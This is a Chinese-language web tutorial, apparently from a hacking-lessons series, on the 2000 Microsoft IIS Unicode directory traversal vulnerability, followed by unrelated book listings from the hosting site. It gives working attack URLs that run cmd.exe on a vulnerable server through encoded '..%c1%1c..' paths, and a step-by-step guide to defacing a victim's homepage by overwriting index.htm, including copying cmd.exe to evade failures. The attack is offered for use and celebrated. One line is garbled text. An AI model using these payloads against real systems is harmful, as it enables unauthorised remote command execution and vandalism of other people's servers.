登陆注册
178000000006

黑客初级技术讲解(下续二)

基础知识(2)

今天我们谈谈unicode漏洞,这可是基础中的基础,重点里的重点,不懂的一定要好好学。

2000年10月17日中联绿盟发布了以下的安全公告:

微软IIS 4.0 / 5.0 扩展UNICODE目录遍历漏洞

远程漏洞:是

本地漏洞:是

发布日期:2000年10月17日

更新日期:2000年10月17日

受影响的版本:

Microsoft IIS 5.0 + Microsoft Windows NT 2000 Microsoft IIS 4.0 + Microsoft Windows NT 4.0 + Microsoft BackOffice 4.5 - Microsoft Windows NT 4.0 + Microsoft BackOffice 4.0 - Microsoft Windows NT 4.0

这可是中国乃至全球网络安全界的一次大变节,入侵nt/2000系统变得如此简单,不打补丁的死路一条。

下面开始正式学习:

一,UNICODE漏洞的原理

此漏洞从中文IIS4.0+SP6开始,还影响中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1, 中国台湾繁体中文也同样存在这样的漏洞。

中文版的WIN2000中,UNICODE编码 存在BUG,在UNICODE 编码中

%c1%1c -〉 (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = ’/’

%c0%2f -〉 (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = ’\’

在NT4中/编码为%c1%9c

在英文版里: WIN2000英文版%c0%af

在中文win2k里:%c1%1c

此外还有多种编码,不一一阐述。

本文例子均以win2k为准,其他类型请自行替换。

基础知识(3)

二,一切从基础开始

由于winnt\system32\cmd.exe的存在,使远程执行命令变为可能,在浏览器里输入以下请求:(假设11.11.22.22有漏洞)

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir

学过dos的应该可以看懂,其实就是利用当中的非法请求使我们可以连到system32下,如果inetpub\目录不合winnt同盘,或者目录级数有改动,可能会引起请求失败。

如果成功,那么在浏览区可看到如下信息:

Directory of C:\inetpub\scripts

2000-09-28 15:49 〈DIR〉 .

2000-09-28 15:49 〈DIR〉 .. (假设目录中没有文件,实际上有一大堆)

是不是有自己机器的感觉了,正点!就是这种感觉!

cmd.exe相当与dos里的command.com,因此,我们可以执行很多命令了!

http://11.11.22.22/msadc/..%c1%1 ... em32/cmd.exe?/c+dir (这个命令同样道理)

大家请注意:/c后面的+,实际上,他就是空格,请记牢!dir开始就是dos命令了,我们可以更改一下:

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\autoexec.bat+c:\winnt\auto.exe

会dos的朋友一定懂其意义了,不懂的请去看书 .

不用说,大家也知道我们就可以利用它来对有漏洞的机器展开攻击了!

三,实战演练

1,修改主页!(是不是很爽?)

一般主页位置在c:\inetpub\wwwroot下,但要是改了路径,就需要找找了。

最方便的方法:在浏览器里输入 http://11.11.22.22/.ida要是有漏洞,那在浏?..皇俏颐堑氖籽 ?/a>

分析法:用dir看各个盘符的根目录,看可疑的就进去看,运气好的在一分钟里找到,这要看运气和直觉。

dir/s法:首先在看其主页,找个图片或连接,看它的文件名,比如,11.11.22.22首页上有一幅图片,右击,属性,看到了吗?iloveu.gif,然后我们利用unicode输入这条命令dir c:\iloveu.gif /s意味着查找c盘下所有目录里的iloveu.gif,注意实际应用时别忘了把空格改为+,如果没有继续找d盘,很快就能确定主页目录的。

找到了目录,就要对它开刀了!一般默认收页为index.htm,index.html,index.asp,default.htm,defautl.html,default.asp中的一个,现在我们确定11.11.22.22中为index.htm

那么我们就修改它吧!

最方便的方法:echo法。echo是一个系统命令,主要用于设置回应开关,而echo cshu >c:\autoexe.bat就是把cshu加入autoexec.bat里并删除原有内容,echo cshunice >>c:\autoexec.bat就是加入cshunice但不删除原有内容,这样我们就可以逍遥的改了。

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+echo+hackedbycshu+>c:\inetpub\wwwroot\index.htm

回应为:HTTP 500 - 内部服务器错误

通过对cmd的分析,袁哥得出一条简便的方法,加入符号

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+echo+hackedbycshu+>c:\inetpub\wwwroot\index.htm

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+echo+2001730+>>c:\inetpub\wwwroot\index.htm

回应为:cgi错误,不用理会

两条命令一下,呵呵,再看看11.11.22.22,是不是烙上我们的大名了?不错吧

而在实际操作中,可能袁哥的方法也会失效,这时,我们就可以copy cmd.exe 为另一个exe,记住路径,用copy后的来echo

例如:11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+cmd.exe+c:\a.exe

11.11.22.22/scripts/..%c1%1c../a.exe?/c+echo+hackedbycshu+>c:\inetpub\wwwroot\index.htm

2,上传法:echo有点不讲道理,把人家的文件破坏了,要是想在主页上增光添彩,那就应该用改好的主页

同类推荐
  • 计算机探密

    计算机探密

    黑客的精神态度是很重要的,但技术则更是重要.黑客的态度虽然是无可取代,随著新科技的发明和旧技术的取代,这些工具随时间在慢慢的改变.要成为一位真正的黑客,你必须要能在几天之内将manual内容和你目前己经知道的关连起学会一种新的语言.也就是说,你必会学还了C之外的东西,你至少还要会LIS/P或Perl(Java也正在努力的挤上这个名单;译者注: 我很怀疑这份名单).除了几个重要的hacking常用语言之外,这些语言提供你一些不同的程序设计途径,并且让你在好的方法中学习.
  • 看穿人心术,拿来就用

    看穿人心术,拿来就用

    如果能掌握“看穿人心术”,人与人之间的沟通会更有效。本书要为您揭晓的“秘术”有:从弦外之音看人际关系、从外表和动作看本性、听到哪些话值得注意、从口头禅看相处之道、从不同的借口洞悉性格等。只要勤加“修炼”,谁都可以更有心机和技巧地处理好人际关系,让家庭更和睦、让工作环境更舒适。尊敬的书友,本书选载最精华部分供您阅读。留足悬念,同样精彩!
  • 演讲的艺术
  • 告诉孩子钱该怎么花

    告诉孩子钱该怎么花

    尊敬的书友,本书选载最精华部分供您阅读。留足悬念,同样精彩!本书是青少年金钱和理财知识教育的实用读本,从介绍、分析中国孩子目前普通存在的错误金钱观和不合理消费行为开始,根据孩子不同年龄段的心智和行为能力水平,为如何开展并实施理财教育,提供了一系列细致的理论和实用的方法指导。
  • 孩子一生最受用的40种能力

    孩子一生最受用的40种能力

    尊敬的书友,本书选载最精华部分供您阅读。留足悬念,同样精彩!本书作者提出的40种能力,对孩子在未来生活中的竞争力是不可缺少的,并相应的为家长提供实际的方法和原则,帮助父母在家庭生活中,如何和孩子共同培养这些能力,开启孩子生命中的优势密码。能力关乎孩子的一生,可以让孩子受益一生,从小培养孩子一生最受用的40种能力,它不仅可以开发孩子的才能和潜力,使其身心得到全面成长与成熟,还能把孩子培养成一个乐观、健康、全面发展的优秀人才。
热门推荐
  • 品书

    品书

    高中议论会上,讨论梦想,有人说儿时梦不提也罢,有人说太过青涩,而总爱想些遥不可及的事,她忽的站起来,说:”每篇文章都会有它的亮点,也许你让一个高中生去看他小学一年级的作文,日记,的确,他会觉得实在写得是太差了,毫无亮点,甚至病句一大堆。可你细细去品,那本小本,何尝不是记录下了你童年的喜怒哀乐,童年的欢愉,在长大以后,是不会有的,字里行间的淳朴,亦是在人踏入社会后消失殆尽。那珍藏的一点点童年的美好,何尝不是在这其中?“众人皆嗤之以鼻,唯有他,目光追随与她,共品其味。
  • 生命之催化乐章:石油化学家闵恩泽

    生命之催化乐章:石油化学家闵恩泽

    奠基中国炼油催化应用科学,以知识报效国家,一生成果难数,开发生物柴油推动绿色化工,凭贡献乐享人生。
  • 赤水醉客

    赤水醉客

    数年前,岐山首徒穆清被逐出师门,孤身闯荡江湖,常居边城赤水,因其嗜酒且好酿酒,被江湖中人称作“赤水醉客”,直至一日,昔日同门师弟身负重伤来到赤水求援……
  • 武御道

    武御道

    千年前,他是孤傲自大的天御道君,她是流落街头的红尘女子。绝世歌舞倾君心,为卿破尽轮回路。他为了她,忤逆天道,冲击轮回之路,以至天道轮回近乎崩溃,天道欲要灭世。为保世赎罪,天御立下千年赌约,定要在千年内,修复轮回之路。轮回池前,他立下誓言,不管你在何方,我一定会来到你身边!小小少年出自大荒,起自姬月,叱咤九仙,血染灵山,戟破星辰,直指千年之约!
  • 荒古鬼魈

    荒古鬼魈

    下山前他立志即使我没有任何修为,不代表我不能做大事,我必以凡人之身踏上帝王之物,以我毫无力量的手臂遮起这片天。他没有修为依旧风生水起,以平凡出生踏上不一般的道路,凡人登帝!
  • 惊华天下,倾世大小姐

    惊华天下,倾世大小姐

    她是绝世天才,他是冰冷少年;穿越后,她是草包废柴,他是皇子殿下。觉醒后,她是神级少女,他是五系同修。飞升后,他们从下界弱渣,变成逆天强者。来见证他们怎样摩擦出爱的火花,来看看他们怎样斩杀天道。逆天姐姐?绝美娘亲?帅锅爹爹?统统包起来。尽在倾华天下呦
  • 傲世阴阳

    傲世阴阳

    一个白虎养大的孤儿一段可歌可泣的倾城之恋六道轮回,大道他却不尊当朋友遇难一念成魔又何妨?”若天要亡我,我就破了这个天!“傲世阴阳交流群:333875373
  • 无可替代的人

    无可替代的人

    危机时刻我们不属于任何人,我们属于这个国家,因为我们穿着军装
  • 贵族学院的蒙尘明珠

    贵族学院的蒙尘明珠

    从小被遗弃在孤儿院的她,再被人领养一年后送孤儿院后变得自闭,不再言语,没有人知道那一年发生了什么,小羽被他的父亲接走两个月后的一天晚上,孤儿院发生了火灾,从此他们的生活发生了翻天覆地的变化。到后面男女主角会相遇,他们又会发生一些什么样的故事呢~~?情节虚构,若有雷同,纯属巧合~~~~~~
  • 盛世天下:魔尊跨界之恋

    盛世天下:魔尊跨界之恋

    本过着普通的凡人生活,却因不凡的身世注定了他一生的不凡。一次偶然的众林之旅,突遇山体崩塌,刘昊天醒来时已身处与世隔绝的山洞之中……法力深厚的神仙……与仙界的紫衣仙子有着怎样千丝万缕的关系,他们将如何演绎一段催人泪下的万世情缘……走出山洞的那一刻,刘昊天已是身怀绝世功法,体内深藏着魔界最强法术的人,他将踏上属于他自己真正的人生旅途。他要找到他亲生的父亲母亲,在他还年幼的时候,父母就被他人陷害不知了去向……今后的日子中看他如何翻手为云覆手为雨一步步走向他人生的巅峰……就让我们从现在开始一步一步看着刘昊天的成长,看新一代的魔界之主是如何登上巅峰的宝座……